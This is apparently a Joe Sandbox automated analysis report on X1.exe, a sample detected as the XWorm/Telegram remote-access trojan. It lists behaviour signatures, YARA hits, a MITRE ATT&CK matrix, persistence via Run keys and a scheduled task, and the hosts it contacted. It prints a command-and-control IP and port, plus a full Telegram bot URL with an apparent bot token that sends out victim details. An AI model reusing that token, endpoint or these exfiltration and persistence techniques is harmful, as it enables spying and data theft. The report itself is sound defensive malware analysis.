                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\Desktop\X1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: X1.exe, 00000000.00000002.3317632463.000000001BD10000.00000004.00000020.00020000.00000000.sdmp, X1.exe, 00000000.00000002.3320628981.000000001BD74000.00000004.00000020.00020000.00000000.sdmp, X1.exe, 00000000.00000002.3323342795.000000001CF8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\X1.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: X1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: X1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: X1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: X1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            Input Capture                            		1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		12
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory23
                            System Information Discovery                            		Remote Desktop Protocol1
                            Input Capture                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		2
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		11
                            Obfuscated Files or Information                            		Security Account Manager441
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                            Registry Run Keys / Startup Folder                            		2
                            Software Packing                            		NTDS2
                            Process Discovery                            		Distributed Component Object ModelInput Capture1
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets51
                            Virtualization/Sandbox Evasion                            		SSHKeylogging2
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input Capture13
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430689 Sample: X1.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 38 api.telegram.org 2->38 40 ip-api.com 2->40 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 56 16 other signatures 2->56 8 X1.exe 15 8 2->8         started        13 X1.exe 2->13         started        15 X1.exe 2->15         started        17 X1.exe 2->17         started        signatures3 54 Uses the Telegram API (likely for C&C communication) 38->54 process4 dnsIp5 42 91.92.252.220, 4442, 49714 THEZONEBG Bulgaria 8->42 44 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 8->44 46 api.telegram.org 149.154.167.220, 443, 49710 TELEGRAMRU United Kingdom 8->46 36 C:\Users\user\AppData\Roaming\X1.exe, PE32 8->36 dropped 60 Protects its processes via BreakOnTermination flag 8->60 62 Bypasses PowerShell execution policy 8->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->64 72 3 other signatures 8->72 19 powershell.exe 23 8->19         started        22 powershell.exe 21 8->22         started        24 powershell.exe 21 8->24         started        26 schtasks.exe 8->26         started        66 Antivirus detection for dropped file 13->66 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            X1.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                            X1.exe71%VirustotalBrowse
                            X1.exe100%AviraTR/Spy.Gen
                            X1.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\X1.exe100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Roaming\X1.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\X1.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                            C:\Users\user\AppData\Roaming\X1.exe71%VirustotalBrowse

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                            https://contoso.com/0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            https://contoso.com/Icon0%URL Reputationsafe
                            91.92.252.2200%Avira URL Cloudsafe
                            91.92.252.22012%VirustotalBrowse

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high
                              api.telegram.org
                              		149.154.167.220
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                91.92.252.220true
                                • 12%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Profalse
                                  		high
                                  http://ip-api.com/line/?fields=hostingfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmptrue
                                      • URL Reputation: malware
                                      • URL Reputation: malware
                                      		unknown
                                      https://api.telegram.org/botX1.exe, X1.exe.0.drfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://contoso.com/Iconpowershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUSfalse
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse
                                                      91.92.252.220
                                                      		unknownBulgaria
                                                      		34368THEZONEBGtrue

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1430689
                                                      Start date and time:2024-04-24 02:53:46 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:X1.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@16/17@2/3
                                                      EGA Information:
                                                      • Successful, ratio: 14.3%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 74
                                                      • Number of non-executed functions: 6
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target X1.exe, PID 5860 because it is empty
                                                      • Execution Graph export aborted for target X1.exe, PID 6112 because it is empty
                                                      • Execution Graph export aborted for target X1.exe, PID 940 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4304 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4320 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6412 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:54:41API Interceptor40x Sleep call for process: powershell.exe modified
                                                      02:55:19Task SchedulerRun new task: X1 path: C:\Users\user\AppData\Roaming\X1.exe
                                                      02:55:21API Interceptor1001329x Sleep call for process: X1.exe modified
                                                      02:55:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run X1 C:\Users\user\AppData\Roaming\X1.exe
                                                      02:55:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run X1 C:\Users\user\AppData\Roaming\X1.exe
                                                      02:55:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                      • ip-api.com/json/
                                                      Ship Docs_ CI_BL_HBL_.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      149.154.167.220Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                        X2.exeGet hashmaliciousXWormBrowse
                                                          HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                  e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                    z0LTqIdZ4A.exeGet hashmaliciousXWormBrowse
                                                                      z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                        W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          91.92.252.220Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                            X2.exeGet hashmaliciousXWormBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ip-api.comOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 208.95.112.1
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 208.95.112.1
                                                                              55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                              • 208.95.112.1
                                                                              Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                              • 208.95.112.1
                                                                              QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 208.95.112.1
                                                                              Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                                              • 208.95.112.1
                                                                              api.telegram.orgOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 149.154.167.220
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              z0LTqIdZ4A.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 149.154.167.220

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              THEZONEBGOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 91.92.252.220
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 91.92.252.220
                                                                              pdhmXuEYmc.exeGet hashmaliciousRedLineBrowse
                                                                              • 91.92.241.122
                                                                              Remittance slip.jsGet hashmaliciousVjW0rmBrowse
                                                                              • 91.92.255.130
                                                                              PROFOMA INVOICE.jsGet hashmaliciousVjW0rmBrowse
                                                                              • 91.92.255.61
                                                                              zirurEg4mX.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.92.252.191
                                                                              qBSw7aeXEM.exeGet hashmaliciousRedLineBrowse
                                                                              • 91.92.250.88
                                                                              cXiIHv7tfd.exeGet hashmaliciousLokibotBrowse
                                                                              • 91.92.253.228
                                                                              wQkjhw6VZ6.elfGet hashmaliciousGafgytBrowse
                                                                              • 91.92.245.31
                                                                              MFj7OCV6NX.elfGet hashmaliciousGafgytBrowse
                                                                              • 91.92.245.31
                                                                              TELEGRAMRUOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 149.154.167.220
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              SecuriteInfo.com.Trojan.Nekark.22288.17032.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.99
                                                                              https://telegrambot-fix.pages.dev/bot.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.99
                                                                              http://telegrambot-fix.pages.dev/waysinGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.99
                                                                              z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              TUT-ASUSOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 208.95.112.1
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 208.95.112.1
                                                                              55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                              • 208.95.112.1
                                                                              Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                              • 208.95.112.1
                                                                              QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 208.95.112.1
                                                                              Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                                              • 208.95.112.1

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0eOutput.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 149.154.167.220
                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              KxgGGaiW3E.exeGet hashmaliciousQuasarBrowse
                                                                              • 149.154.167.220
                                                                              https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-websiteGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              YZPS3Bfyza.exeGet hashmaliciousQuasarBrowse
                                                                              • 149.154.167.220
                                                                              CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 149.154.167.220

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\X1.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\X1.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):654
                                                                              Entropy (8bit):5.380476433908377
                                                                              Encrypted:false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
